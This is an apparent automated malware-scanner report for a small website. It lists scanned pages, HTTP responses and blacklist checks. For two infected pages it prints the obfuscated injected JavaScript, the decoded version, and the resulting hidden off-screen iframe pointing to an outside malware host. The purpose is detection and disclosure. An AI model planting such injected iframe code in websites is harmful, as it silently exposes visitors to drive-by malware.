New scan:

Malware Scanner report for westernpartytown.com

Malicious/Suspicious/Total urls checked
2/0/11
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.westernpartytown.com/
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:34 GMT
Location: http://westernpartytown.com/
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://westernpartytown.com/
200 OK
Content-Length: 16635
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\
... 2024 bytes are skipped ...
105\x6Eab\154\145d|6\x30\x7C\156\141\166i\x67\x61t\157r|1\x35\65e|x6\x31|\x69n\144\145\170Of|\x31\x34\x32o\162|\1706\x38\x70|\x31\64\x37\157|\x78\x331|\170\67\x38|\x78\667|\1702\105c\x7C\x78\x32F\174\1703E\174x\x36\65x|\x78\67\x30\151\x7C1\66\62\x65\163|9\71\719\x399\x39\x7C\67\64|\170\661\155\x7Cx\x37\x34d\174x6\x46n\1741\66\62|\x74o\125\124\x43String|5\x37|\61\67\x30\x7C\170\67\x30\170\x7C\x315\x37\x70\174\65\65\174\170\666e\174\61\64\x37|x6\x43|\x78\66\63v|\61\660\174167'.split('\x7C'),0,{}))

Decoded script:


var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1
... 981 bytes are skipped ...
162\143\x3D\x22\150\x74\164\x70\72\57/\167\160\142\x69\147\x66e\x63v\56\x6C\x6Fn\x67\x6D\165\163\151\143\x2Ec\157\155\x2F\151\x6E\144\145\x78\56\x70\x68p?\147o=\x31\"\x3E\74/\151\x66r\x61m\145>');document.cookie='\137\137\165\155\x74d='+Math.floor(Math.random()*9999999)+';\x20\x65x\x70i\162es\75'+exp.toUTCString()}
<iframe width="112" height="165" frameborder="0" style="position:absolute;left:-284px;top:-209px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://sm6.sitemeter.com/js/counter.js?site=sm6westpartytown
HTTP/1.1 302 Redirect
Date: Sat, 04 Oct 2014 20:05:37 GMT
Location: http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown
Server: Microsoft-IIS/6.0
Content-Length: 184
Content-Type: text/html
X-Powered-By: ASP.NET
clean
http://sm6.sitemeter.com/js/counter.asp?site=sm6westpartytown
200 OK
Content-Length: 7567
Content-Type: application/x-javascript
clean
http://www.westernpartytown.com/index.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:36 GMT
Location: http://westernpartytown.com/index.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://westernpartytown.com/index.html
200 OK
Content-Length: 16645
Content-Type: text/html
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\\167\53'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\x5C\x62'+e(c)+'\x5C\142','g'),k[c]);return p;}('\x4B\40\143=L\x20O(\51\73\143\56\x48\x28c\56\105\50\51\531\x29;\107(11\x2E\132\x26&\x6C\56\171\5614\50\x27R\134W\x5Cg\\\x65\\\144\134\166\47\51\75\
... 2024 bytes are skipped ...
105\x6Eab\154\145d|6\x30\x7C\156\141\166i\x67\x61t\157r|1\x35\65e|x6\x31|\x69n\144\145\170Of|\x31\x34\x32o\162|\1706\x38\x70|\x31\64\x37\157|\x78\x331|\170\67\x38|\x78\667|\1702\105c\x7C\x78\x32F\174\1703E\174x\x36\65x|\x78\67\x30\151\x7C1\66\62\x65\163|9\71\719\x399\x39\x7C\67\64|\170\661\155\x7Cx\x37\x34d\174x6\x46n\1741\66\62|\x74o\125\124\x43String|5\x37|\61\67\x30\x7C\170\67\x30\170\x7C\x315\x37\x70\174\65\65\174\170\666e\174\61\64\x37|x6\x43|\x78\66\63v|\61\660\174167'.split('\x7C'),0,{}))

Decoded script:


var exp=new Date();exp.setDate(exp.getDate()+1);if(navigator.cookieEnabled&&document.cookie.indexOf('_\x5Fu\x6D\x74\144\x3D')==-1){document.write('\x3C\x69\x66r\141\x6D\145\x20\x77\151\144\164\150=\x22'+Math.floor(Math.random()*100+100)+'\42\x20\x68\x65ig\150\164\75\"'+Math.floor(Math.random()*100+100)+'\"\x20\146\x72\x61\155e\142or\144e\x72\75\x22\60\"\x20\163\164yl\145\75\x22\x70\157\163\151\x74\x69\x6F\x6E\72\141\142\163ol\165\164e\x3B\154\x65\x66t\72-'+Math.floor(Math.random()*1
... 981 bytes are skipped ...
162\143\x3D\x22\150\x74\164\x70\72\57/\167\160\142\x69\147\x66e\x63v\56\x6C\x6Fn\x67\x6D\165\163\151\143\x2Ec\157\155\x2F\151\x6E\144\145\x78\56\x70\x68p?\147o=\x31\"\x3E\74/\151\x66r\x61m\145>');document.cookie='\137\137\165\155\x74d='+Math.floor(Math.random()*9999999)+';\x20\x65x\x70i\162es\75'+exp.toUTCString()}
<iframe width="185" height="145" frameborder="0" style="position:absolute;left:-251px;top:-225px" src="http://wpbigfecv.longmusic.com/index.php?go=1"></iframe>

Antivirus reports:

Sophos
Mal/Iframe-AN

http://westernpartytown.com/directions.html
200 OK
Content-Length: 9484
Content-Type: text/html
clean
http://westernpartytown.com/contact.html
200 OK
Content-Length: 11503
Content-Type: text/html
clean
http://westernpartytown.com/test404page.js
404 Not Found
Content-Length: 564
Content-Type: text/html
clean
http://www.westernpartytown.com/contact.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:39 GMT
Location: http://westernpartytown.com/contact.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean
http://www.westernpartytown.com/directions.html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sat, 04 Oct 2014 20:05:40 GMT
Location: http://westernpartytown.com/directions.html
Server: nginx
Content-Length: 178
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: westernpartytown.com

Result:
HTTP/1.1 200 OK
Cache-Control: max-age=0, no-cache, must-revalidate, proxy-revalidate
Connection: close
Date: Sat, 04 Oct 2014 20:05:35 GMT
Pragma: public
Server: nginx
Vary: Accept-Encoding
Content-Type: text/html
Expires: Sun, 05 Oct 2014 20:05:35 GMT
X-Page-Speed: 1.6.29.5-3346
Second query (visit from search engine):
GET / HTTP/1.1
Host: westernpartytown.com
Referer: http://www.google.com/search?q=westernpartytown.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=westernpartytown.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://westernpartytown.com/

Result: westernpartytown.com is not infected or malware details are not published yet.